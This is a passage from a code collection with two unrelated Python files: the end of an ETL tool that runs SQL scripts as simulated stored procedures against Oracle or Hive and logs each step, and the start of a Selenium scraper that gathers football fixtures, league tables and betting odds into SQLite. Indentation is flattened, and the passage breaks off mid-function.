assert row_num >= 0 and isinstance(row_num, int), \
'row_num error (0 = fetch up to 50000 rows, a positive int fetches that many rows), input=<%s>' % str(row_num)
def instance_check(iterable1):  # adapt SQL Server rows, which come back as a custom row type rather than tuples
if isinstance(iterable1[-1], tuple):
return iterable1
else:
iterable1 = [tuple(i) for i in iterable1]
return iterable1
if row_num == 0:
data = self.fetch(printf=False)
assert data, 'No data returned!'
data = instance_check(list(data))
df = pd.DataFrame(list(data))
else:
data = self.fetch(row_num, printf=False)
assert data, 'No data returned!'
data = instance_check(list(data))
df = pd.DataFrame(data)
if header:
df.columns = self.columns()
return df
def fetch_logs(self):
"""新增读取hive日志"""
if self.DB_type == 'HIVE':
return self.curr.fetch_logs()
if __name__ == '__main__':
pass
```
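A minimal usage sketch of the class above, assuming DB_Buddy.py is importable and that the host, port and credentials shown are placeholders for a reachable Oracle instance.
```python
from DB_Buddy import DatabaseBuddy  # assumption: module available on the import path

# option=4 sets the Oracle session parallel degree, as handled in __enter__ above.
with DatabaseBuddy('ORACLE', 'etl_user', 'etl_pwd', '10.0.0.1', '1521', option=4) as db:
    affected = db.excute_one("UPDATE t_demo SET flag = 1 WHERE flag = 0", commit=True)
    db.excute_one("SELECT * FROM t_demo")
    df = db.to_dataframe(row_num=100)  # first 100 rows of the last query as a pandas.DataFrame
    print(affected, list(df.columns))
```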
#### File: running-procedure/PyProcedure/procedure_executor.py
```python
import sys
import datetime as dt
import json
import traceback
import pdb
from pandas import DataFrame
if sys.platform == 'linux':
import imp
sql_praser = imp.load_source('sql_praser', '/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/pyProcedure/sbin/sql_praser.py')
sql_event_manager = imp.load_source('sql_event_manager', '/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/pyProcedure/sbin/sql_event_manager.py')
config = imp.load_source('config','/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/pyProcedure/conf/config.py')
DB_Buddy = imp.load_source('DB_Buddy', '/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/python_app/sbin/DB_Buddy.py')
import sql_praser
import sql_event_manager
import config
import DB_Buddy
else:
import sql_praser
import sql_event_manager
import config
from database import DB_Buddy
"""
SQL-based stored-procedure executor: simulates Oracle-style stored procedures by sending SQL statements to the target database, and records execution logs.
Author: Zhangjinwei
Date: 20200819
Version: v1.0
"""
def json_update(json_old, new_dic):
"""将字典的值更新到json串中"""
if len(json_old) > 8 and isinstance(new_dic, dict):
json_dic = json.loads(json_old, encoding='utf-8')
json_dic.update(new_dic)
json_new = json.dumps(json_dic, ensure_ascii=False)
return json_new
else:
return json_old
def exception_handel(e):
"""错误捕捉"""
print('程序报错:', e,dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
traceback.print_exc() # 打印异常信息
exc_type, exc_value, exc_traceback = sys.exc_info()
return_msg = str(repr(traceback.format_exception(exc_type, exc_value, exc_traceback)))[:800]
return return_msg
def seconds_to_hms(seconds: int) -> str:
"""时间格式转换"""
hour, minute, second = seconds // 3600, seconds % 3600 // 60, seconds % 60
strf_time = dt.datetime(2020, 1, 1, int(hour), int(minute), int(second)).strftime('%H:%M:%S')
return strf_time
def re_run(log: DataFrame, option):
warn_msg = """开始断点重跑>>>
重跑逻辑:
!!!前提是已跑的后面的步骤不会影响之前步骤的数据:如表格重用,或删除了中间表的数据,则必须全部重跑,否则数据错误。
1 如原脚本没有改动,那么从原断点处开始重跑
2 原脚本有改变,那么从第一个修改处开始重跑
"""
if isinstance(log, DataFrame):
status_code = log.loc['step_status'].to_list()
def excutor(db, exec_plan_cls, log_manager):
"""存储过程执行主函数"""
dynamic_pool = {}
exec_sign = 1
log_df = log_manager.get_job_record()  # fetch today's most recent execution record for this job
return_code = 0
with db:
exec_plan_df = exec_plan_cls.excute_plan  # generate the step-by-step execution plan
exec_plan_df1 = exec_plan_df.copy(deep=True)
exec_plan_df1.fillna(' ', inplace=True)
for index, plan in exec_plan_df1.iterrows():
start_time = dt.datetime.now()
return_msg = ''
sql_all = sql_praser.remove_quote(str(plan['sql_all']), all_quote=True)  # strip comments
sql = sql_all.strip() if sql_all else ' '
infer, variable_pool = str(plan['infer']), str(plan['variable_pool'])
variable_pool = json_update(variable_pool, dynamic_pool) if len(variable_pool) > 5 else ''  # merge in new variables produced by dynamic execution
if infer.startswith('execute_') and exec_sign:
# statement execution branch
return_msg = 'Executed successfully'
affected_rows = 0
try:
exec_sql = exec_plan_cls.sql_add_variables(sql, variable_pool) if len(variable_pool) > 5 else sql
affected_rows = db.excute_one(exec_sql)
except Exception as e:
return_msg = exception_handel(e)
exec_plan_df1.at[index, 'deal_row'] = affected_rows
exec_plan_df1.at[index, 'exec_sign'] = 1
sql = exec_sql
elif infer == 'select_into' and exec_sign:
# select into变量动态赋值模块
try:
select_sql, variable_list = exec_plan_cls.select_into_praser(sql)  # split the statement in two: the query and the variable names to assign
select_sql = exec_plan_cls.sql_add_variables(select_sql, variable_pool)  # substitute known variables first
db.excute_one(select_sql)  # run the query
var_df = db.to_dataframe(row_num=1)  # fetch the query result
variable_value = var_df.values.tolist()[0]
assert len(variable_list) == len(variable_value), 'Variable count mismatch: variable_list:%s variable_value:%s' % (str(variable_list), str(variable_value))
variable_pool_dic = json.loads(variable_pool, encoding='utf-8')
variable_dic = {}
for key1, val1 in zip(variable_list, variable_value):
variable_dic.update({key1: val1})
variable_pool_dic.update(variable_dic)  # 1) update variable values
exec_plan_df1.at[index, 'variable_infer'] = json.dumps(variable_dic, ensure_ascii=False) # 2
sql = select_sql
exec_plan_df1.at[index, 'exec_sign'] = 1
except Exception as e:
return_msg = exception_handel(e)
elif infer.startswith('if_'):
# if else功能主模块
criteria = ' '
if infer == 'if_then':
bool_value, criteria = exec_plan_cls.if_clause_praser(sql, variable_pool)
exec_sign = bool_value
elif infer == 'if_elsif_then' and not exec_sign:
bool_value, criteria = exec_plan_cls.if_clause_praser(sql, variable_pool)
exec_sign = bool_value
elif infer == 'if_else' and not exec_sign:
exec_sign = 1
elif infer == 'if_end':
exec_sign = 1
exec_plan_df1.at[index, 'exec_sign'] = exec_sign
exec_plan_df1.at[index, 'if_bool_check'] = criteria
end_time = dt.datetime.now()
exec_time = (end_time - start_time).seconds
exec_time = seconds_to_hms(exec_time)
exec_plan_df1.at[index, 'start_time'] = start_time.strftime('%Y-%m-%d %H:%M:%S')
exec_plan_df1.at[index, 'return_msg'] = return_msg
exec_plan_df1.at[index, 'end_time'] = end_time.strftime('%Y-%m-%d %H:%M:%S')
exec_plan_df1.at[index, 'spend_time'] = exec_time
if sql:
sql = sql.replace('\'', '`').replace('\"', '``').replace('\n', 'char(10)')
exec_plan_df1.at[index, 'sql_short'] = sql[:100]
exec_plan_df1.at[index, 'sql_send'] = sql[:800]
if infer.startswith('execute_') or infer.startswith('if_') or infer in ('variable_setting', 'select_into'):
# write the brief per-step log record to the warehouse
log_manager.record(exec_plan_df1.iloc[[index]])
if return_msg not in ('', 'Executed successfully') and plan['exception_handle'] != 'ignore':
# abort-on-error check
print('Execution stopped, error message: ', return_msg, '>>>%s' % plan['sql_send'], sql)
exec_plan_df1.at[index, 'step_status'] = 'ERROR'
exec_plan_df1['variable_pool'].apply(lambda x: json_update(x, dynamic_pool))  # preserve the variable state after a failure
# exec_plan_df1.drop(columns=['sql_all'], inplace=True)
log_manager.record_detail(exec_plan_df1)
return_code = 1
break
log_manager.record_detail(exec_plan_df1)  # record the full detailed log
# exec_plan_df1.to_excel(r'D:\DDL_BACKUP\text.xlsx')
return return_code
def run(tx_date, db_name, script_addr):
"""主调用函数"""
t0 = dt.datetime.now()
print('<< PyProcedure V1.0 >> by Zlaw\n')
print('%s Program started' % t0.strftime('%Y-%m-%d %H:%M:%S'), '\nBatch date: ', tx_date, 'Warehouse name: ', db_name, '\nProcedure path: ', script_addr)
DB_type, db_username, db_pwd, db_IP, db_port = config.ServerConfig(db_name).info()  # load connection configuration
db = DB_Buddy.DatabaseBuddy(DB_type, db_username, db_pwd, db_IP, db_port, option=16)  # connect to the database
exec_plan = sql_praser.FormattedSql(script_addr, tx_date, DB_type)  # build the execution plan
exec_plan.server = db_IP
event_manager = sql_event_manager.EventKeeper(DB_type, db_IP, exec_plan.job_name, tx_date)  # initialise the event logger
return_code = excutor(db, exec_plan, event_manager)  # start execution
t1 = dt.datetime.now()
totol_time = seconds_to_hms((t1 - t0).seconds)
print('%s Program finished' % t1.strftime('%Y-%m-%d %H:%M:%S'), 'Return code: ', return_code, 'Total run time: ', totol_time)
assert return_code == 0, 'Program execution failed'
if __name__ == '__main__':
if sys.platform == 'linux':
try:
v_tx_date = sys.argv[1]
db_name = sys.argv[2]
sql_script_path = sys.argv[3]
except:
print('Invalid arguments')
raise ValueError('Arg 1: v_tx_date, e.g. 20200819; Arg 2: database name, e.g. edw or hive; Arg 3: path of the SQL script to run')
try:
other_option = sys.argv[4]
print('Optional parameter set to', other_option)
except:
other_option = None
run(v_tx_date, db_name, sql_script_path)
else:
script_path = r'D:\DDL_BACKUP\Oracle_DDL\ARPT\PROCEDURE\P_EXT_LOANINVOICE_EVENT_20200323_0956.sql'
run('20200827', 'edw', script_path)
``` |
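As the `__main__` block above shows, on Linux the executor is invoked as `python procedure_executor.py <v_tx_date> <db_name> <sql_script_path>`. Below is a small worked example of the two pure helpers defined above; it assumes a Python version where `json.loads` still accepts the `encoding` keyword used in `json_update` (pre-3.9).
```python
# Run from within this module (importing it pulls in sql_praser/config/DB_Buddy, which
# must be available), or paste the two helpers into a REPL to try them:
print(seconds_to_hms(3725))                                    # -> '01:02:05'
print(json_update('{"v_tx_date": "20200819"}', {"v_cnt": 5}))  # -> '{"v_tx_date": "20200819", "v_cnt": 5}'
```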
{
"source": "Jinx876/BetterOdds",
"score": 3
} |
#### File: BetterOdds/BetterOdds/betterodds.py
```python
import sqlite3
from sqlite3 import Error
from urllib.request import pathname2url
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import numpy
from math import floor
import time
from shutil import copy2
import datetime
import os
# Initialize Selenium Driver
options = Options()
options.headless = True
driver = webdriver.Chrome(options=options)
driver.implicitly_wait(40)
def main_db_check():
"""Check for the existence of main database and rebuilds if non existent"""
# Check for and rebuild main.db
global main_cur
global main_conn
try:
print("Connecting to main database...")
maindburi = 'file:{}?mode=rw'.format(pathname2url('main.db'))
main_conn = sqlite3.connect(maindburi, uri=True)
main_cur = main_conn.cursor()
print("Connection to main.db successful")
except sqlite3.OperationalError:
try:
print("Connection to main.db unsuccessful. Attempting to rebuild database..")
main_conn = sqlite3.connect('main.db')
main_cur = main_conn.cursor()
print("Main database successfully rebuilt")
except Error as e:
print("Rebuild of main.db unsuccessful. Exiting Application. Please see error message below \n", e)
# def archive_db_check():
# """Check for the existence of archive database and rebuilds if non existent"""
#
# # Check for and rebuild archive.db
# global archive_cur
# global archive_conn
# try:
# print("Connecting to archive database...")
# archdburi = 'file:{}?mode=rw'.format(pathname2url('archive.db'))
# archive_conn = sqlite3.connect(archdburi, uri=True)
# archive_cur = archive_conn.cursor()
# print("Connection to archive.db successful \n")
# return archive_cur
#
# except sqlite3.OperationalError:
# try:
# print("Connection to archive.db unsuccessful. Attempting to rebuild database..")
# archive_conn = sqlite3.connect('archive.db')
# archive_cur = archive_conn.cursor()
# print("Archive database successfully rebuilt \n")
# return archive_cur
# except Error as e:
# print("Rebuild of archive.db unsuccessful. Exiting Application. Please see error message below \n", e)
def db_table_check():
"""Check for the existence of tables in databases and rebuilds them if non existent"""
leagues_create = '''CREATE TABLE IF NOT EXISTS `leagues` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`country_name` TEXT NOT NULL,
`league_name` TEXT NOT NULL UNIQUE,
`country_league_name` TEXT NOT NULL,
`league_url` TEXT NOT NULL,
`league_winperc` INTEGER,
`single_chnc_margin` INTEGER,
`double_chnc_margin` INTEGER,
`pos_weighting` REAL,
`team_name_weighting` REAL,
`form_weighting` REAL,
`gd_weighting` REAL,
`pos_winrate` INTEGER,
`team_name_winrate` INTEGER,
`form_winrate` INTEGER,
`gd_winrate` INTEGER
);'''
match_data_create = '''CREATE TABLE IF NOT EXISTS `match_data` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`match_datetime` TEXT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_team_name` TEXT,
`home_team_ID` TEXT,
`away_team_name` TEXT,
`away_team_ID` TEXT,
`home_win` REAL,
`away_win` REAL,
`home_draw` REAL,
`away_draw` REAL,
`match_url` TEXT
);'''
league_data_home_create = '''CREATE TABLE IF NOT EXISTS `league_data_home` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_position` INTEGER,
`home_total_clubs` INTEGER,
`home_team_name` TEXT,
`home_team_id` TEXT,
`home_matches_played` INTEGER,
`home_matches_won` INTEGER,
`home_matches_draw` INTEGER,
`home_matches_loss` INTEGER,
`home_goal_diff` INTEGER,
`home_team_form` INTEGER
);'''
league_data_away_create = '''CREATE TABLE IF NOT EXISTS `league_data_away` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`away_position` INTEGER,
`away_total_clubs` INTEGER,
`away_team_name` TEXT,
`away_team_id` TEXT,
`away_matches_played` INTEGER,
`away_matches_won` INTEGER,
`away_matches_draw` INTEGER,
`away_matches_loss` INTEGER,
`away_goal_diff` INTEGER,
`away_team_form` INTEGER
);'''
name_conversion_create = '''CREATE TABLE IF NOT EXISTS `name_conversion` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`uefa_team_name` TEXT,
`flashscore_team_name` TEXT
);'''
uefa_team_ranking_create = '''CREATE TABLE IF NOT EXISTS `uefa_team_ranking` (
`fid` INTEGER PRIMARY KEY AUTOINCREMENT,
`team_rank` INTEGER,
`team_name` TEXT,
`uefa_points` REAL
);'''
match_analysis_create = '''CREATE TABLE IF NOT EXISTS `match_analysis` (
`fid` INTEGER PRIMARY KEY AUTOINCREMENT,
`match_datetime` TEXT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_team_name` TEXT,
`home_team_id` TEXT,
`away_team_name` TEXT,
`away_team_ID` TEXT,
`home_win` REAL,
`home_draw` REAL,
`away_draw` REAL,
`away_win` REAL,
`home_position` INTEGER,
`away_position` INTEGER,
`total_clubs` INTEGER,
`home_matches_played` INTEGER,
`away_matches_played` INTEGER,
`home_matches_won` INTEGER,
`away_matches_won` INTEGER,
`home_matches_draw` INTEGER,
`away_matches_draw` INTEGER,
`home_matches_loss` INTEGER,
`away_matches_loss` INTEGER,
`home_goal_diff` INTEGER,
`away_goal_diff` INTEGER,
`home_team_form` INTEGER,
`away_team_form` INTEGER,
`home_team_name_rank` REAL,
`away_team_name_rank` REAL,
`home_position_rank` REAL,
`away_position_rank` REAL,
`home_form_rank` REAL,
`away_form_rank` REAL,
`home_gd_rank` REAL,
`away_gd_rank` REAL,
`home_points_total` REAL,
`away_points_total` REAL,
`rec_bet` TEXT,
`percentage_chance` INTEGER,
`percentage_rec` INTEGER,
`match_result` TEXT,
`bet_result` TEXT,
`TEST_rec_bet` TEXT,
`TEST_bet_result` TEXT,
`match_url` TEXT UNIQUE
);'''
archive_table_create = '''CREATE TABLE IF NOT EXISTS `match_archive` (
`fid` INTEGER PRIMARY KEY AUTOINCREMENT,
`match_datetime` TEXT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_team_name` TEXT,
`home_team_id` TEXT,
`away_team_name` TEXT,
`away_team_ID` TEXT,
`home_win` REAL,
`home_draw` REAL,
`away_draw` REAL,
`away_win` REAL,
`home_position` INTEGER,
`away_position` INTEGER,
`total_clubs` INTEGER,
`home_matches_played` INTEGER,
`away_matches_played` INTEGER,
`home_matches_won` INTEGER,
`away_matches_won` INTEGER,
`home_matches_draw` INTEGER,
`away_matches_draw` INTEGER,
`home_matches_loss` INTEGER,
`away_matches_loss` INTEGER,
`home_goal_diff` INTEGER,
`away_goal_diff` INTEGER,
`home_team_form` INTEGER,
`away_team_form` INTEGER,
`home_team_name_rank` REAL,
`away_team_name_rank` REAL,
`home_position_rank` REAL,
`away_position_rank` REAL,
`home_form_rank` REAL,
`away_form_rank` REAL,
`home_gd_rank` REAL,
`away_gd_rank` REAL,
`home_points_total` REAL,
`away_points_total` REAL,
`rec_bet` TEXT,
`percentage_chance` INTEGER,
`percentage_rec` INTEGER,
`match_result` TEXT,
`bet_result` TEXT,
`TEST_rec_bet` TEXT,
`TEST_bet_result` TEXT,
`match_url` TEXT UNIQUE,
`league_url` TEXT NOT NULL,
`league_winperc` INTEGER,
`single_chnc_margin` INTEGER,
`double_chnc_margin` INTEGER,
`pos_weighting` REAL,
`team_name_weighting` REAL,
`form_weighting` REAL,
`gd_weighting` REAL,
`pos_winrate` INTEGER,
`team_name_winrate` INTEGER,
`form_winrate` INTEGER,
`gd_winrate` INTEGER
);'''
main_cur.execute(match_data_create)
main_cur.execute(leagues_create)
main_cur.execute(league_data_home_create)
main_cur.execute(league_data_away_create)
main_cur.execute(name_conversion_create)
main_cur.execute(uefa_team_ranking_create)
main_cur.execute(match_analysis_create)
main_cur.execute(archive_table_create)
main_conn.commit()
# -----------------------------------Leagues-------------------------------------------------
def leagues_display():
"""Prints the leagues from database"""
main_cur.execute("SELECT fid, country_league_name, league_url FROM Leagues")
leagues_view = main_cur.fetchall()
if len(leagues_view) == 0:
print("There are no leagues stored at the moment. Try adding some leagues \n")
else:
print("League List:")
for fid, country_league_name, league_url in leagues_view:
print(fid, country_league_name, league_url)
print(" ")
def league_update_add():
"""Adds leagues to the league database"""
while True:
user_prompt = input("Please paste the league webpage link from flashscore.com here: ")
driver.get(user_prompt)
league_country = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[2]').get_attribute('textContent')
league_name = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[3]').get_attribute('textContent')
country_league_name = league_country + ' ' + league_name
try:
main_cur.execute("INSERT INTO Leagues (country_name, league_name, country_league_name, league_url) "
"VALUES (?, ?, ?, ?)",
(league_country, league_name, country_league_name, user_prompt.strip()))
main_conn.commit()
print(country_league_name, "was added to the database \n")
break
except sqlite3.IntegrityError:
print(" ")
print(country_league_name, "is already in the database. Please try adding another league. \n")
print(" ")
continue
def league_update_delete():
"""Deletes leagues from the league database"""
while True:
user_prompt = input("Please input the number next to the league you would like to delete: ")
main_cur.execute("SELECT country_league_name FROM leagues WHERE fid = ?", (user_prompt,))
league_title = main_cur.fetchall()
if len(league_title) > 0:
main_cur.execute("DELETE FROM leagues WHERE fid = ?", (user_prompt,))
main_conn.commit()
print(" ")
print(league_title, "has been deleted")
break
else:
print(" ")
print(user_prompt, "is not a valid database entry. Please try again. \n")
continue
def leagues_url_return():
"""Return League links from database"""
main_cur.execute("SELECT league_url FROM leagues")
leagues_url = main_cur.fetchall()
return leagues_url
def league_names_return():
"""Return league names from database"""
main_cur.execute("SELECT country_league_name FROM leagues")
league_names = main_cur.fetchall()
return league_names
# ------------------------------------Match Data--------------------------------------------
def match_data_delete():
"""Delete match data table"""
main_cur.execute("DELETE FROM match_data WHERE fid IS NOT NULL")
main_conn.commit()
def match_list_create(leagues_url):
"""Find upcoming matches"""
match_list = []
for league_url in leagues_url:
driver.get(league_url[0])
# find scheduled matches
scheduled_matches = driver.find_element_by_xpath(
'//*[@id="fs-summary-fixtures"]/table/tbody').find_elements_by_tag_name('tr')
for match in scheduled_matches:
smatch_id = match.get_attribute('id')
if len(smatch_id) > 0:
match_list.append(smatch_id[4:])
else:
continue
# find today's matches
try:
today_matches = driver.find_element_by_xpath('//*[@id="fs"]/div/table/tbody').find_elements_by_tag_name(
'tr')
for tmatch in today_matches:
tmatch_id = tmatch.get_attribute('id')
if len(tmatch_id) > 0:
match_list.append(tmatch_id[4:])
else:
continue
except:
continue
# driver.close()
return match_list
def match_info(match_list):
"""Gather match data"""
total_matches = len(match_list)
matches_scanned = 0
for match_id in match_list:
try:
match_url = 'https://www.flashscore.com/match/' + match_id + '/#match-summary'
driver.get(match_url)
match_status = driver.find_element_by_css_selector(
'#flashscore > div.team-primary-content > div.match-info > div.info-status.mstat').get_attribute(
'textContent')
if match_status == 'Finished' or match_status == 'Postponed' or match_status == 'Cancelled':
continue
match_datetime_raw = driver.find_element_by_xpath('//*[@id="utime"]').get_attribute('textContent')
match_datetime_split = match_datetime_raw.split(' ')
match_time = match_datetime_split[1] + ':00'
match_date = match_datetime_split[0].split('.')
match_datetime = match_date[2] + '-' + match_date[1] + '-' + match_date[0] + ' ' + match_time
match_country_name = str(driver.find_element_by_xpath(
'//*[@id="detcon"]/div[1]/div[2]/div[1]/div/div[1]/span[2]').get_attribute('textContent')
).split(':')[0].capitalize()
match_league_name = str(driver.find_element_by_xpath(
'//*[@id="detcon"]/div[1]/div[2]/div[1]/div/div[1]/span[2]/a').get_attribute(
'textContent')).split(' -')[0].strip()
country_league_name = match_country_name + ' ' + match_league_name
home_team_name = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[1]/div[2]/div/div/a').get_attribute('textContent')
away_team_name = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[3]/div[2]/div/div/a').get_attribute('textContent')
home_team_id = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[1]/div[1]/div/a').get_attribute(
'onclick')[-25:-17]
away_team_id = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[3]/div[1]/div/a').get_attribute(
'onclick')[-25:-17]
home_win_odds = driver.find_element_by_xpath(
'//*[@id="default-odds"]/tbody/tr/td[2]/span/span[2]/span').get_attribute('textContent')
if home_win_odds == '-':
home_win_odds = 0.00
away_win_odds = driver.find_element_by_xpath(
'//*[@id="default-odds"]/tbody/tr/td[4]/span/span[2]/span').get_attribute('textContent')
if away_win_odds == '-':
away_win_odds = 0.00
dc_odds_url = 'https://www.flashscore.com/match/' + match_id + '/#odds-comparison;double-chance;full-time'
driver.get(dc_odds_url)
home_draw_odds = driver.find_element_by_xpath('//*[@id="odds_dch"]/tbody/tr[1]/td[2]/span').get_attribute(
'textContent')
if home_draw_odds == '-':
home_draw_odds = 0.00
away_draw_odds = driver.find_element_by_xpath('//*[@id="odds_dch"]/tbody/tr[1]/td[4]/span').get_attribute(
'textContent')
if away_draw_odds == '-':
away_draw_odds = 0.00
main_cur.execute('''INSERT INTO match_data(match_datetime, country_name, league_name, country_league_name,
home_team_name, home_team_ID, away_team_name, away_team_ID, home_win, away_win, home_draw, away_draw,
match_url)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)''',
(match_datetime, match_country_name, match_league_name, country_league_name,
home_team_name, home_team_id, away_team_name, away_team_id, home_win_odds, away_win_odds,
home_draw_odds, away_draw_odds, match_url))
main_conn.commit()
matches_scanned += 1
print("Scanning match", matches_scanned, "of", total_matches, "|", home_team_name, "vs", away_team_name)
# driver.close()
except:
matches_scanned += 1
print("Skipped match", matches_scanned, "of", total_matches, "|", match_url)
continue
# ------------------------------------League Scrape-----------------------------------------
def league_table_delete():
"""Delete data in the home and away league tables"""
main_cur.execute("DELETE FROM league_data_home")
main_cur.execute("DELETE FROM league_data_away")
main_conn.commit()
def league_data_home(leagues_url):
"""Retrieve home league data for listed leagues"""
leagues_scanned = 0
total_leagues = len(leagues_url)
for league_url in leagues_url:
driver.get(str(league_url[0]))
try:
driver.find_element_by_xpath('//*[@id="tabitem-table-home"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-1"]/tbody').find_elements_by_tag_name('tr')
except:
driver.find_element_by_xpath('//*[@id="tabitem-table"]/span/a').click()
driver.find_element_by_xpath('//*[@id="tabitem-table-home"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-2"]/tbody').find_elements_by_tag_name('tr')
counter = 1
for row in tablerow:
country_name = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[2]').get_attribute('textContent')
league_name = driver.find_element_by_xpath('//*[@id="fscon"]/div[1]/div[2]').get_attribute('textContent')
country_league_name = country_name + ' ' + league_name
home_position = counter
home_total_clubs = len(tablerow)
home_team_name = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('textContent')
home_team_id = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('onclick')[
-12:-4]
home_matches_played = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[3]').get_attribute(
'textContent'))
home_matches_won = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[4]').get_attribute(
'textContent'))
home_matches_draw = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[5]').get_attribute(
'textContent'))
home_matches_loss = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[6]').get_attribute(
'textContent'))
goal_fa = str(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[7]').get_attribute(
'textContent')).split(':')
home_goal_diff = int(goal_fa[0]) - int(goal_fa[1])
form_list = []
home_team_form = 0
try:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[6]').get_attribute('class')[26]
form_list.append(form_game5)
except:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[1]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[26]
form_list.append(form_game5)
for form in form_list:
if form == 'w':
form = 3
elif form == 'd':
form = 1
else:
form = 0
try:
home_team_form += form
except:
home_team_form = int(input('Team: ' + home_team_name + '| Please Input Team Form Here: '))
main_cur.execute('''INSERT INTO league_data_home (country_name, league_name, country_league_name, home_position, home_total_clubs,
home_team_name, home_team_id, home_matches_played, home_matches_won, home_matches_draw, home_matches_loss,
home_goal_diff, home_team_form)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
''', (country_name, league_name, country_league_name, home_position, home_total_clubs, home_team_name, home_team_id,
home_matches_played, home_matches_won, home_matches_draw, home_matches_loss, home_goal_diff,
home_team_form))
main_conn.commit()
counter += 1
leagues_scanned += 1
print("Updated home table", leagues_scanned, "of", total_leagues, "|", country_league_name, "table")
def league_data_away(leagues_url):
"""Retrieve away league data for listed leagues"""
leagues_scanned = 0
total_leagues = len(leagues_url)
for league_url in leagues_url:
driver.get(str(league_url[0]))
try:
driver.find_element_by_xpath('//*[@id="tabitem-table-away"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-1"]/tbody').find_elements_by_tag_name('tr')
except:
driver.find_element_by_xpath('//*[@id="tabitem-table"]/span/a').click()
driver.find_element_by_xpath('//*[@id="tabitem-table-away"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-3"]/tbody').find_elements_by_tag_name('tr')
counter = 1
for row in tablerow:
country_name = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[2]').get_attribute('textContent')
league_name = driver.find_element_by_xpath('//*[@id="fscon"]/div[1]/div[2]').get_attribute('textContent')
country_league_name = country_name + ' ' + league_name
away_position = counter
away_total_clubs = len(tablerow)
time.sleep(0.1)
away_team_name = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('textContent')
away_team_id = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('onclick')[
-12:-4]
away_matches_played = int(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[3]').get_attribute(
'textContent'))
away_matches_won = int(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[4]').get_attribute(
'textContent'))
away_matches_draw = int(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[5]').get_attribute(
'textContent'))
away_matches_loss = int(
